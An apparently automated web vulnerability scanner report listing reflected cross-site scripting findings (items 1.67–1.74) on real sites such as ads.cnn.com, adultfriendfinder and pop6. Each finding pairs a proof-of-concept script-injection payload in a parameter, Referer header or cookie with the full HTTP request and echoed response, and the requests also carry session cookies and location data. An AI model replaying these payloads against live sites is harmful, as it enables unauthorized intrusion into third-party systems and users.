GET /signup.php?next=%27&prev=&email=&username=ffa66><script>alert(1)</script>4cbc2a1fa75fa2b7b&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:49 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m9
Vary: Accept-Encoding
Content-Length: 29361

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<INPUT id="username_field" type="text" maxLength=20 name=username value=ffa66><script>alert(1)</script>4cbc2a1fa75fa2b7b>
...[SNIP]...

1.67. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4d0ae<script>alert(1)</script>36510e690a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 4d0ae<script>alert(1)</script>36510e690a7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 15 Aug 2011 18:45:59 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 4d0ae<script>alert(1)</script>36510e690a7

1.68. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b24"-alert(1)-"59d37ff595f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c3b24"-alert(1)-"59d37ff595f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:07:34 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,A34H6pWAGCJPfhzZNI1EmpzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:07:34 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki45-14.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13368
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
=(timedout==1)?'5000+':pageEndTime-pageStartTime;var sessionId=escape("GQ5`J^U@jEUU 1313434702 50.23.123.106 ");var pageName=escape(location.pathname);var referer="http://www.google.com/search?hl=en&q=c3b24"-alert(1)-"59d37ff595f";var refererPageName=getRefererPageName(referer);var screenResolution=screen.width+"x"+screen.height;var glean=new Image();var ffProto=("https:"==document.location.protocol)?"https://":"http://";var r
...[SNIP]...

1.69. http://banners.bookofsex.com/go/page/iframe_cm_26400 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eccc2"-alert(1)-"1c6e02646aa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=eccc2"-alert(1)-"1c6e02646aa
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:59:12 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,O0W/sZQoVB2ERTr5ZZM8EhPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:59:12 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki55-35.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24493
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<]@DQN[>L 1313434558 50.23.123.106 ");var pageName=escape(location.pathname);var referer="http://www.google.com/search?hl=en&q=eccc2"-alert(1)-"1c6e02646aa";var refererPageName=getRefererPageName(referer);var screenResolution=screen.width+"x"+screen.height;var glean=new Image();var ffProto=("https:"==document.location.protocol)?"https://":"http://";var r
...[SNIP]...

1.70. http://pop6.com/p/memsearch.cgi [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acc0e"-alert(1)-"5394e928717621386 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /p/memsearch.cgi?who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find_sex=2&min_age=18&max_age=35&country=United+States&state=California&zipcode=10010 HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=acc0e"-alert(1)-"5394e928717621386
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:10:06 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,kRs57bKB2_5chyvK5CT70nu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:10:06 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii82-33.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75954
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
=(timedout==1)?'5000+':pageEndTime-pageStartTime;var sessionId=escape("^5L\@NF^^jH6 1313434662 50.23.123.106 ");var pageName=escape(location.pathname);var referer="http://www.google.com/search?hl=en&q=acc0e"-alert(1)-"5394e928717621386";var refererPageName=getRefererPageName(referer);var screenResolution=screen.width+"x"+screen.height;var glean=new Image();var ffProto=("https:"==document.location.protocol)?"https://":"http://";var r
...[SNIP]...

1.71. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f56"><script>alert(1)</script>79814dffe55 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-172f56"><script>alert(1)</script>79814dffe55

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:05 GMT
Server: Apache
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:05 GMT
Pragma: no-cache
Content-Length: 3278
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
14&Targets=91904,90974,1515,75426&Values=46,60,81,100,150,679,1588,2677,2746,4443,48137,52263,52897,56058,58570,58702,61089,61887,61908,61913,63267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-172f56"><script>alert(1)</script>79814dffe55%2CTID%2C1604588547342336%2CTIL%2C392593343132&Redirect=http://edition.cnn.com/SPORT/">
...[SNIP]...

1.72. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5c7"><script>alert(1)</script>fa0472838cf was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-14c5c7"><script>alert(1)</script>fa0472838cf; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:41 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:41 GMT
Pragma: no-cache
Content-Length: 1097
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=730,2247,2743,2823,3285,9496,9779,9781,9853,10381,16113,17251,18517,18982,19419,19974,30544,30550,32594,3
...[SNIP]...
,1067,1285,1588,1678,1686,1735,2677,2746,4443,37359,47128,47457,52263,52779,52897,56058,56872,57896,58570,58702,61089,61263,61887,61908,61913,63267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-14c5c7"><script>alert(1)</script>fa0472838cf%2CTID%2C1604588547342336%2CTIL%2C392593343133&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.73. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eec6"><script>alert(1)</script>17ca6eaa7ac was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-12eec6"><script>alert(1)</script>17ca6eaa7ac; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:20 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:20 GMT
Pragma: no-cache
Content-Length: 3581
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
89,1678,1686,1735,3443,3445,3458,4443,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,61089,61263,61887,61908,61913,63267,116196,116271,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-12eec6"><script>alert(1)</script>17ca6eaa7ac%2CTIL%2C1313434106153&Redirect=http://www.money.com">
...[SNIP]...

1.74. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 662fd"><script>alert(1)</script>dd428081f4e was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

